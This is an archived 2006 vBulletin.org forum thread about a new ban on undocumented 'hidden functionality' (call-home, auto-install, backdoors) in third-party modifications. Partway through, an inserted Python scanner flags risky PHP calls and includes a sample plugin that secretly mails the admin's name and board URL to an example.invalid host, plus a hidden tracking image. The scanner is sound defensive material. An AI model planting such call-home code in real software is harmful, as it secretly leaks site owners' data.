vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   News and Announcements (https://vborg.vbsupport.ru/forumdisplay.php?f=2)
-   -   Important: It is all about trust (https://vborg.vbsupport.ru/showthread.php?t=115640)

Marco van Herwaarden 05-15-2006 08:59 AM

Important: It is all about trust
 
Most of our members are using vBulletin to provide a Forum on their website(s). What are the reasons people have chosen vBulletin over other similar solutions? There can be many answers to this, but I think there is one that will be on everyone’s list: Trust.

You have bought software from a company that you trust, you are confident that they will provide you with quality software, with no known security issues. If a security issue is found, you’re confident that it will be addressed as soon as possible. Knowing this you can concentrate on your community, instead of being worried about security issues.

As your community grows you will find that you have needs for non-standard functionality, or just extra’s that will put your community ahead of your competition. Now here vBulletin.org comes in the picture.

Where the vBulletin software itself is created, maintained and supported by ‘professionals’, the vBulletin.org community relies solely on volunteer coders. This gives enthusiast coders the opportunity to contribute to the community and enhance the vBulletin product, making the life of running your own community easier.

Where the coders on vBulletin.org might give you professional solutions, they are to some level anonymous; it is not a company that has much to lose in case of a broken trust relationship. They will offer you software solutions, often free of charge, for your Board that you might install without ever seeing (all) of the code that is getting installed on your server. This is even more true with vBulletin 3.5, where most modifications are done by simply installing a product file instead of manually doing code changes.

Now where is this post going? You install probably numerous modifications on your board, provided by different coders. By installing software, you give total control of your board in the hands of these ‘anonymous’ coders. This requires a high level of trust towards them.

Where common sense, reading other users’ responses and testing on a Test Board can prevent you from disasters caused by coding errors (hey, we are all human) or differences in the environment, there is another vulnerability that you cannot so easily protect yourself against: hidden functionality in the installed modification.

Hidden functions that are not documented and/or disclosed by the author can lead to a lot of things, I will try to sum up a few that are possible, some ‘innocent’, some with possible severe consequences. Some possible examples:
- A backdoor into your AdminCP
- Mailing admin passwords to the authors account.
- Call-home functions
- Usage tracking
- Disruption of service or data
- Any other technique that is used in Spyware/Malware type of software.

The stand of vBulletin.org Staff is that our members should be able to completely trust the solutions offered here as much as possible. This means that we will not tolerate any form of hidden functionality, since that is the only way we can keep the trust of the members using these solutions.

The reason for this thread is that, to our own shame, we recently received reports that there are coders who do incorporate hidden functionality in their modifications. Luckily the type of hidden functions could be considered relatively harmless, but we will nevertheless not tolerate this. I would like to emphasize that this did not send any security or privacy related information, nor did it in any way break the security of your site.

The discovered hidden functionality was aimed at a backdoor in the services of vBulletin.org itself, and has by now been closed. The effect of this functionality will be corrected by us soon. There have been no negative effects on the boards that are using any of these modifications.

From the time of this post on we will take the following actions upon discovery of such modifications:
- All users who have clicked Install for this modification will be notified about the issue.
- The offending modification will be withdrawn immediately.
- Depending on the severity, all modifications submitted by this author could be withdrawn immediately, and the user account of the author could be closed.
- Admin will contact the author by mail to inform him and hear his/her side of the story.

The vBulletin.org team wants to apologize for any breach of trust this has caused. We hope that our members will be confident that we are addressing these issues seriously and as well as we can, and that you can continue to have a trust relationship with the authors that offer solutions here at vBulletin.org.

vBulletin.org Team

Marco van Herwaarden 05-15-2006 08:59 AM

To all the coders that have currently released modifications that contain such hidden functionality: you are given until June 1st to either remove your modifications or to upload a new version. All modifications found after June 1st with hidden functionality will be addressed according to the steps outlined above!

Staff is still discussing how to handle the benefits that these authors had from releasing this code. Expect the Staff to come with a decision on this soon.

Lottis 05-15-2006 09:35 AM

Is there any possibility that we can get informed which hacks this is meant to be?
Or that the coders can inform in the hacks that this is happening in their hacks?

The Geek 05-15-2006 09:41 AM

wow, my curiosity is killing me!

theArchitect 05-15-2006 09:44 AM

Quote:

Originally Posted by MarcoH64
The reason for this thread is that, to our own shame, we received recently reports that there are coders who do incorporate hidden functionalities in their modifications.

Thanks for raising this. Adding hidden functions to hacks is very uncool.

I am glad you have raised this Marco and for what it is worth you and the vBorg staff have my full support in this.

Darat 05-15-2006 09:54 AM

Will you be providing a list of all such (known) hacks - some people may not have clicked on install? I think I have for all the hacks I've installed BUT I'd rather be certain.

Marco van Herwaarden 05-15-2006 09:58 AM

Quote:

Originally Posted by Lottis
Is there any possibility that we can get informed which hacks this is meant to be?
Or that the coders can inform in the hacks that this is happening in their hacks?

At this time Staff has not decided yet if we will name the Hacks/Authors involved in public. As mentioned before, the found issues don't cause any real harm to the users; if it would have harmed users, we would probably already have disclosed it.

Coders are always free to inform the users in their hack threads, but then it wouldn't be hidden functionality anymore ;)

Rickie3 05-15-2006 10:04 AM

What hack in question should we be wary of, please?

Marco van Herwaarden 05-15-2006 10:10 AM

As mentioned before, we will not disclose this at the present time. Maybe we will disclose it later.

Alan @ CIT 05-15-2006 10:37 AM

You've even got me interested now :D Can you give us further details of what the "hidden function" was? Without revealing the name of the hack/author of course.

ie, did it just do usage tracking? increase the hack thread view count? send an e-mail to the author saying where it had been installed? etc? :)

Thanks,
Alan.

Marco van Herwaarden 05-15-2006 10:47 AM

Sorry but that is information that i can not disclose at this point.

If it would have sent the author an email where it was installed, we would have considered this a serious breach of personal confidentiality, and would have taken immediate stronger measures.

Darat 05-15-2006 11:02 AM

I know you've replied about not being decided about whether to release the details of hacks with known "back-doors" etc.

However I would like to ask in the strongest possible terms that you do release the information. As you say this is about trust as much as anything else and whilst I can understand it may cause some upset among the coders that coded these hacks however (in this instance) they should not be the primary concern. Especially since it is, to be blunt, their actions that have led to the trust that was built up here being damaged, albeit that I'm sure none of them did it with the intention of causing any such problems.

I strongly believe your primary concern should be in regaining the trust of the vast majority of people such as myself. Many people will lose trust in both vBulletin.org and vBulletin itself (because of the link between the two) if everything is not only done to rectify this situation, but also seen to be done. Transparency, when possible, is always the best way to build trust.

Please give this some consideration.

(Edited to add: I said "back-doors" in the above, I wasn't meaning to imply backdoors into the forums that used the hacks.)

Edit MarcoH64: To make it very clear to others reading this: The current issue does not involve a back-door into your forum! If such a thing would have been the case, we would have reacted stronger.

Bhuwan 05-15-2006 11:13 AM

There should be a hall of shame...

Darat 05-15-2006 11:27 AM

I don't think it should be about taking any terrible punitive actions against anyone - according to MarcoH64 these are not hidden features that could cause problems to the majority of us.

However there is the matter of trust - a hack installed from here has the potential to be of concern for quite literally hundreds of thousands of people (considering how many people are members of vBulletin powered forums worldwide that might be an understatement).

Jelsoft have (in my opinion) a great reputation for dealing with security issues in their core product in a timely and professional manner - it would be unfortunate for that to be tarnished via this forum, even unintentionally.

Delphiprogrammi 05-15-2006 11:37 AM

hmmmmmz,

I have a few here. It wouldn't even cross my mind to do a thing like that. Marco, are you serious, do people really create a hack that does things like you mentioned above? Then they can't be punished hard enough. A lifetime ban from vbulletin.com and vbulletin.org and immediate licence deactivation would be a good idea.

Argh, that people even think about that; maybe they are ipb spies ;)

Marco van Herwaarden 05-15-2006 11:47 AM

The fact that you install any software could always possibly open you to unknown harmful actions by the coder of that software. This is not really something new.

We have (until now) never found any hacks released here that had harmful hidden features. My list is what could possibly happen if someone means harm.

PS Even if it is said as a joke, it doesn't look good on us if we would abuse this issue to spread negative feelings about a competitor in the forum business, and I would like to ask all not to make such comments anymore.

Let's stick to comments about our own community.

amykhar 05-15-2006 11:48 AM

You know, any of you who know how to read PHP could always go read the code in the product installs and such and know immediately who is calling external functions from the code. You don't need staff to tell you who the bad guys are.
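The point made in the post above (read the product file yourself rather than waiting for staff to name names), together with the list of possible hidden functions in the opening announcement, can be turned into a quick first pass. The following scanner is an added example and not code from the thread or from vBulletin.org: it parses a vBulletin 3.5-style product XML file, pulls the PHP out of every <plugin> element, and reports calls that send mail, open network connections, run shell commands or decode/evaluate hidden payloads, plus any hard-coded external URL. The sample product file is constructed for the example; its plugin titles, the example.invalid domain and the admin_global/global_start hook assignments are illustrative, not taken from any real release.

```python
import re
import xml.etree.ElementTree as ET

# PHP functions whose presence in a plugin body warrants a manual read.
# A hit means "open the file and read this", not "this product is malicious":
# many of these have legitimate uses, and commented-out code is not stripped.
SUSPICIOUS_CALLS = {
    "mail": "sends e-mail (could carry admin details to the author)",
    "fsockopen": "opens a raw network socket (call-home)",
    "curl_init": "HTTP client (call-home / usage tracking)",
    "file_get_contents": "fetches remote content when given a URL",
    "fopen": "opens remote content when given a URL",
    "eval": "runs code assembled at run time (backdoor primitive)",
    "create_function": "runs code assembled at run time (backdoor primitive)",
    "base64_decode": "commonly used to hide a payload from a casual reader",
    "shell_exec": "runs a shell command",
    "exec": "runs a shell command",
    "system": "runs a shell command",
    "passthru": "runs a shell command",
}

# Match a bare call like "mail(" or "@mail (" but not "my_mail(" or "$mail".
CALL_RE = re.compile(
    r"\b(" + "|".join(re.escape(n) for n in SUSPICIOUS_CALLS) + r")\s*\(",
    re.IGNORECASE,
)
# Any absolute http(s) URL literal inside plugin code is worth a look:
# hidden 1x1 images, auto-install redirects and tracking pixels all need one.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def scan_product_xml(xml_text):
    """Return one finding per suspicious call or URL literal, for every
    <plugin> in a vBulletin 3.5-style product file."""
    root = ET.fromstring(xml_text)
    findings = []
    for plugin in root.iter("plugin"):
        title = plugin.findtext("title", default="") or ""
        hook = plugin.findtext("hookname", default="") or ""
        code = plugin.findtext("phpcode", default="") or ""  # CDATA body
        for m in CALL_RE.finditer(code):
            name = m.group(1).lower()
            findings.append({"plugin": title, "hook": hook, "kind": "call",
                             "value": name, "why": SUSPICIOUS_CALLS[name]})
        for m in URL_RE.finditer(code):
            findings.append({"plugin": title, "hook": hook, "kind": "url",
                             "value": m.group(0),
                             "why": "hard-coded external URL in plugin code"})
    return findings


def plugins_needing_review(findings):
    """Map plugin title -> sorted list of flagged values, for a quick summary."""
    out = {}
    for f in findings:
        out.setdefault(f["plugin"], set()).add(f["value"])
    return {title: sorted(values) for title, values in out.items()}


# Constructed sample product file (not a real release): one harmless plugin,
# one that mails the board URL and admin name to the author, and one that
# emits a hidden 1x1 image pointing at an external site.
SAMPLE_PRODUCT_XML = """<product productid="example_mod" active="1">
  <title>Example Mod</title>
  <version>1.0</version>
  <plugins>
    <plugin active="1" executionorder="5">
      <title>Show extra link</title>
      <hookname>global_start</hookname>
      <phpcode><![CDATA[$show['example_link'] = true;]]></phpcode>
    </plugin>
    <plugin active="1" executionorder="5">
      <title>Phone home</title>
      <hookname>admin_global</hookname>
      <phpcode><![CDATA[
@mail('author@example.invalid', 'New install',
      $vbulletin->options['bburl'] . ' ' . $vbulletin->userinfo['username']);
]]></phpcode>
    </plugin>
    <plugin active="1" executionorder="5">
      <title>Auto install click</title>
      <hookname>admin_global</hookname>
      <phpcode><![CDATA[
echo '<img src="http://example.invalid/showthread.php?do=install&t=123" width="1" height="1" />';
]]></phpcode>
    </plugin>
  </plugins>
</product>
"""

if __name__ == "__main__":
    for f in scan_product_xml(SAMPLE_PRODUCT_XML):
        print(f"[{f['kind']}] plugin '{f['plugin']}' on hook {f['hook']}: "
              f"{f['value']} - {f['why']}")
```

Run it against a downloaded product-*.xml by reading the file into scan_product_xml(); the harmless plugin produces no output, the other two are each listed with the reason. Plugins that only set template variables or query the board's own database are invisible to this check, which is intentional: the scan narrows what you read by hand, it does not replace reading it.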

nytxn 05-15-2006 12:03 PM

Thanks for letting us know, and thanks for taking action going forward!

Paul M 05-15-2006 12:30 PM

I'm just a little curious about this.

Most of my products now have a couple of lines that try to click install (or uninstall) automatically when you first install them (or remove them). This is completely harmless (and unreliable) but it's certainly not secret - it has been discussed a number of times without any staff mentioning it broke any rules, and is used by a number of people.

I can't believe that this would be what you are referring to as it would be massively OTT with talk of security and backdoors, but perhaps you could clarify if this is covered by this policy or not, since if it is, I will have to remove it.

Marco van Herwaarden 05-15-2006 12:40 PM

Unless you specifically warn the users of such a hack, in the hack thread or the install text before installation, that this will happen, then yes, it would fall under the category addressed in this thread. Regardless of whether you consider this harmless or not.

The Geek 05-15-2006 12:53 PM

A redirect to the install button isn't really a back-door, nor a security breach, especially considering that no coder can tell who the install was or where it came from. No personal or server info could have been passed.
Therefore I'm with Paul on that one.
If it was submitting info to another site where the author could access the info, then I'm with Marco there.

Just my thoughts

Paul M 05-15-2006 01:00 PM

I see, so this is okay as long as a note is included in the hack? In reality, it has not been very useful; it doesn't actually seem to work a lot of the time, so given that it now seems to fall foul of this new policy I think I might just remove it.

Marco van Herwaarden 05-15-2006 01:00 PM

Quote:

Originally Posted by The Geek
A redirect to the install button isn't really a back-door, nor a security breach, especially considering that no coder can tell who the install was or where it came from. No personal or server info could have been passed.
Therefore I'm with Paul on that one.

My official response to this:

Read the thread title. It is not about whether it is harmful or not. It is not about whether the coder could use an auto-install to get privacy sensitive information. It is about breaking the trust of our members by adding hidden functionality to a modification. Period.


Now back to your example on a personal level: I think I could give you some reasons in a PM that would also show that even this is disclosing things.

The Geek 05-15-2006 01:12 PM

You calling me Livewire now?!? I'm flattered :D

I assumed that the thread was about users potentially gathering personal data. The threat (as you mentioned) is always there, policy or not, and yes, I agree that users should be aware. I was only stating that if the catalyst was Paul's hack that redirects to an install link, then I just didn't agree that it would fall under a 'security', 'phishing', 'backdoor' type of policy.
Regardless, I guess it is kind of sneaky and it does explain why so many people clicked install on Paul's hacks ;)
Now I just need to solve the whole 'last supper/floating hand' mystery and I'll die content.

If you have the time and inclination, go for the PM. I'm interested, but I won't be refreshing my inbox every 5 seconds for it as I know you have far more pressing things to get on with :)

Marco van Herwaarden 05-15-2006 01:21 PM

Quote:

Originally Posted by The gReek
You calling me Limewire now?!? I'm flattered

Oops my mistake, corrected.

The policy is about hidden functionality and trust, not about whether it damages anything.

PS Don't expect that PM very soon, but I will work on it when I have time.

Paul M 05-15-2006 01:27 PM

Quote:

Originally Posted by The Geek
Regardless, I guess it is kind of sneaky and it does explain why so many people clicked install on Paul's hacks ;)

Actually, it was only added about 4 weeks ago after a discussion about it on the site. Someone suggested it, so I gave it a try; in reality it doesn't work very well: people who have clearly installed a hack still don't show up when they post. Many of the others still post to say "installed" anyway; they click install manually. I couldn't even get it to work properly myself in tests and it wasn't really important enough to investigate why. Now it comes under this change I will almost certainly give up on it.

The Geek 05-15-2006 01:28 PM

sas efharisto

(that's Greek for thank you ;) - Your quoting system is squiffy :D )

Marco van Herwaarden 05-15-2006 01:32 PM

Dank je (Dutch for thank you)

That is what happens if you rely on manual quoting. ;)
PS You only spotted 1 of the 2 quoting "errors" in my previous post.

Paul M 05-15-2006 01:35 PM

I spotted Limewire ;)

Floris 05-15-2006 01:44 PM

Quote:

Originally Posted by MarcoH64
The fact that you install any software could always possibly open you to unknown harmful actions by the coder of that software. This is not really something new.

We have (until now) never found any hacks released here that had harmful hidden features. My list is what could possibly happen if someone means harm.

PS Even if it is said as a joke, it doesn't look good on us if we would abuse this issue to spread negative feelings about a competitor in the forum business, and I would like to ask all not to make such comments anymore.

Let's stick to comments about our own community.

Nope, I can assure you that unless it slipped by me there are no 2.x or 3.0.x resources that did this. It's a trend that's started to develop ever since 3.5 went stable.

Again, the issue here is that it is about undocumented functionality and that unfortunately it is to better the author; but no security breach was added to your forum upon installing, nor was any data shared or backdoor installed.

And finally, as mentioned in the announcement, we will listen to their side of the story. Surely, as Paul M suggests, his motives were different from a few others. Nevertheless it is something that people have noticed and raised concern about. I think the vBorg staff is on top of things and has updated their site policy in regard to these types of things and automatically included optional misuse of undocumented features, saving them the future discussion of when people decide to include backdoors or data-mining code, etc.

Marco van Herwaarden 05-15-2006 01:45 PM

Quote:

Originally Posted by Paul M
I spotted Limewire ;)

Well spotted. 1 vb.org bonus point for you.

Lottis 05-15-2006 02:18 PM

Quote:

Originally Posted by amykhar
you know, any of you who know how to read php could always go read the code in the product installs and such and know immediately who is calling external functions from the code. You don't need staff to tell you who the bad guys are.

Well, not everyone has those skills, I'm afraid. I certainly don't.
I lay all my trust in the coders that give out their hacks; call me perhaps naive, but I do. And since this is vBorg, I have always thought that this site didn't want to be letting coders do this because of its high reputation as serious.

Quote:

Originally Posted by MarcoH64
The fact that you install any software could always possibly open you to unknown harmful actions by the coder of that software. This is not really something new.

This is new for me. And I have been here for 2 years. ;)
I think I have put too much trust in vBorg following up on this issue.

*sorry for my bad English*

Paul M 05-15-2006 02:31 PM

BTW, I'm also curious about this: I believe vBulletin itself makes a call back to vbulletin.com every time you visit your ACP, and passes back your licence code. I don't recall this being mentioned when you install vBulletin; I can't even find it in the licence. Does this mean that vB now falls foul of your policy?

Protoman 05-15-2006 02:38 PM

I believe that's a bit different because it is the original forum software. They're not going to hard code something in that could trash your board.

Products are 3rd party code though, and you could throw just about anything in there to execute.

Floris 05-15-2006 02:42 PM

Quote:

Originally Posted by Paul M
BTW - I'm also curious about this - I believe vbulletin itself makes a call back to vbulletin.com everytime you visit your ACP, and passes back your licence code - I don't recall this being mentioned when you install vbulletin, I can't even find it in the licence - does this mean that vB now falls foul of your policy ?

Besides this part from the license agreement, which you click during purchase and before downloading each .zip file. Therefore you agree to it.

Quote:

From time to time, Jelsoft may inspect your registration integrity. This will be done without collecting any information whatsoever about your server or your users. The only information verified will be your licence number and the domain on which the software is run. Should Jelsoft discover discrepancies in the software usage, be aware that you may lose your licence and may face legal actions for Software Piracy. Your information will not be shared with 3rd parties. Occasionally, it is necessary to record your IP address for security and performance monitoring.
http://www.vbulletin.com/order/license_agreement.php

Any questions in regards to the Jelsoft License Agreement please redirect them outside of vBulletin.org directly to Jelsoft Sales through: http://www.vBulletin.com/go/sales

Marco van Herwaarden 05-15-2006 02:45 PM

Quote:

Originally Posted by Lottis
This is new for me. And I have been here for 2 years. ;)
I think I have put too much trust in vBorg following up on this issue.

Lottis,

I am talking in general there, all software. It doesn't matter if it is a PHP script, a Windows application, or even an application that a company has coded in-house.

Paul M 05-15-2006 02:54 PM

Quote:

Originally Posted by Floris
Besides this part from the license agreement, which you click during purchase and before downloading each .zip file. Therefore you agree to it.

Just read it again :)

Quote:

From time to time, Jelsoft may inspect your registration integrity. This will be done without collecting any information whatsoever about your server or your users.
That does not exactly specify that the software has hidden functionality to call home every time you use your admin CP; at best it's extremely vague. :)

Logikos 05-15-2006 02:59 PM

This clears a lot of things up. This is the reason why Paul was getting so much heat in the forums. I'm with Paul and TheGeek on this one. I will add my few lines of thought about the situation and move on.

Attempting to click the install link when you install a product is nothing new. I've seen this in a couple of hacks in the past. It just looks for an image of the install URL and uninstall URL. It's completely harmless and in no way, shape or form does this create a security issue for users installing these hacks. You should make that completely clear to the users, as your main post seems to suggest to users that there are flaws in hacks here.

Quote:

From time to time, Jelsoft may inspect your registration integrity. This will be done without collecting any information whatsoever about your server or your users. The only information verified will be your licence number and the domain on which the software is run. Should Jelsoft discover discrepancies in the software usage, be aware that you may lose your licence and may face legal actions for Software Piracy. Your information will not be shared with 3rd parties. Occasionally, it is necessary to record your IP address for security and performance monitoring.
If vBulletin is allowed to do this, why can't we? vBulletin states that they occasionally will record your IP address for security and performance monitoring. A vBulletin coder will occasionally record that you have installed this modification for statistical purposes. The only issue I could see is that the authors didn't state this in the first post. Wouldn't this be allowed if we simply told users about this?

Either way, I will follow the new rule, and I don't think it would be fair to remove accounts as this was never mentioned in the TOS of the vB.org site. Another thing I should add is that emails no longer allow me to uninstall hacks from my email. I had received an update email and I clicked the uninstall link in the email and I was just redirected back to the portal page.

Floris 05-15-2006 03:01 PM

Quote:

Originally Posted by Paul M
Just read it again :)


That does not exactly specify that the software has hidden functionality to call home every time you use your admin CP; at best it's extremely vague. :)

Let me quote myself again:

Quote:

Any questions in regards to the Jelsoft License Agreement please redirect them outside of vBulletin.org directly to Jelsoft Sales through: http://www.vBulletin.com/go/sales

Rimer dal 05-15-2006 03:03 PM

While I see the way you are coming at this issue, it isn't uncommon in the real world for free software to include callback functionality. When I release freeware I never have the intent of stealing information, but because it is free I know that even if it is a small minority, people are prone to remove information that, by downloading and using your software, they agreed to. Unlike vB, most free software lacks proper legal protection, and using a callback, harmless as it is, they ensure the integrity of the software hasn't been compromised as per the terms of the contract.

Now I agree, it isn't a kind thing to do without warning the users first, but those offenders may be code-wise and can expect it. It would defeat the purpose of the validation functions. So if you ban us from using such validation here you should at least afford the coders the ability to report websites using their hacks released here outside the terms of the hack and have that user face consequences for their actions.

While it is trust that keeps users here, it is coders that keep the users here in the first place, and so for both groups protection needs to be afforded, I feel, not just one side of the crowd, because alone they don't work together.

I hope I made my point clear
-Rimer-

PS: I have not released any hacks here under this account, but the hacks I have released do not include callbacks as they were ports and not mine originally, and thus I did not feel obligated to do it since the original author had not. However, if I ever release custom hacks I'd like to see protection afforded to both sides.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
